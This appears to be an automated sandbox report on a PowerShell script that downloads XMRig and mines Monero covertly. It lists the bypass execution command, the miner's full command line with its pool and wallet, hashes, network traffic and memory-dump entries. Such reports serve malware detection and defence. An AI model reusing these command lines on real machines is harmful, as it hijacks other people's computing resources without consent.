US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp

Files

memory/4112-4-0x00007FFF43B33000-0x00007FFF43B34000-memory.dmp

memory/4112-5-0x000001EB5EF00000-0x000001EB5EF22000-memory.dmp

memory/4112-7-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp

memory/4112-9-0x000001EB5F0B0000-0x000001EB5F126000-memory.dmp

memory/4112-10-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lzax4efi.bex.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4112-25-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp

memory/4112-48-0x000001EB5F580000-0x000001EB5F592000-memory.dmp

memory/4112-61-0x000001EB5F0A0000-0x000001EB5F0AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1492-90-0x000001C6E2900000-0x000001C6E2920000-memory.dmp

memory/1492-91-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-92-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/4112-93-0x00007FFF43B33000-0x00007FFF43B34000-memory.dmp

memory/4112-94-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp

memory/1492-95-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-96-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-97-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-98-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-99-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-100-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-101-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-102-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-103-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-104-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-105-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-106-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-107-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-108-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-109-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-110-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-111-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-112-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-113-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-114-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-115-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-116-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-117-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-118-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-119-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-120-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-121-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-122-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-123-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-124-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-125-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-126-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-127-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-128-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-129-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-130-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-131-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-132-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-133-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-134-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-135-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-136-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-137-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-138-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-139-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-140-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-141-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-142-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-143-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-144-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-145-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-146-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-147-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-148-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-149-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-150-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-151-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-152-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-153-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-154-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-155-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:15

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

memory/3508-2-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-5-0x0000019A99B90000-0x0000019A99BB2000-memory.dmp

memory/3508-6-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-9-0x0000019A99D90000-0x0000019A99E06000-memory.dmp

memory/3508-10-0x00007FF992770000-0x00007FF99315C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mepv04rq.1h4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3508-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-48-0x0000019A99D50000-0x0000019A99D62000-memory.dmp

memory/3508-61-0x0000019A99BE0000-0x0000019A99BEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3708-90-0x0000013153CC0000-0x0000013153CE0000-memory.dmp

memory/3508-91-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-92-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3708-93-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3508-94-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3708-95-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-96-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-97-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-98-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-99-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-100-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-101-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-102-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-103-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-104-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-105-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-106-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-107-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-108-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-109-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-110-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-111-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-112-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-113-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-114-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-115-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-116-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-117-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-118-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-119-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-120-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-121-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-122-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-123-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-124-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-125-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-126-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-127-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-128-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-129-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-130-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-131-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-132-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-133-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-134-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-135-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-136-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-137-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-138-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-139-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-140-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-141-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-142-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-143-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-144-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-145-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-146-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-147-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-148-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-149-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-150-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-151-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-152-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-153-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-154-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-155-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-156-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:16

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1745s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp

Files

memory/2108-0-0x00007FF8EF1A3000-0x00007FF8EF1A5000-memory.dmp

memory/2108-1-0x0000021E221A0000-0x0000021E221C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dq1ngru4.dqt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2108-11-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp

memory/2108-12-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp

memory/2108-14-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp

memory/2108-15-0x0000021E22F40000-0x0000021E22F52000-memory.dmp

memory/2108-16-0x0000021E221E0000-0x0000021E221EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3568-47-0x0000020DC4520000-0x0000020DC4540000-memory.dmp

memory/3568-48-0x0000020DC4570000-0x0000020DC4590000-memory.dmp

memory/3568-49-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/2108-50-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp

memory/3568-52-0x0000020DC5E40000-0x0000020DC5E60000-memory.dmp

memory/2108-51-0x00007FF8EF1A3000-0x00007FF8EF1A5000-memory.dmp

memory/3568-53-0x0000020DC5E60000-0x0000020DC5E80000-memory.dmp

memory/3568-54-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/2108-55-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp

memory/3568-56-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-58-0x0000020DC5E40000-0x0000020DC5E60000-memory.dmp

memory/3568-57-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-59-0x0000020DC5E60000-0x0000020DC5E80000-memory.dmp

memory/3568-60-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-61-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-62-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-63-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-64-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-65-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-66-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-67-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-68-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-69-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-70-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-71-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-72-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-73-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-74-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-75-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-76-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-77-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-78-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-79-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-80-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-81-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-82-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-83-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-84-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-85-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-86-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-87-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-88-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-89-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-90-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-91-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-92-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-93-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-94-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-95-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-96-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-97-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-98-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-99-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-100-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-101-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-102-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-103-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-104-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-105-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-106-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-107-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-108-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-109-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-110-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-111-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

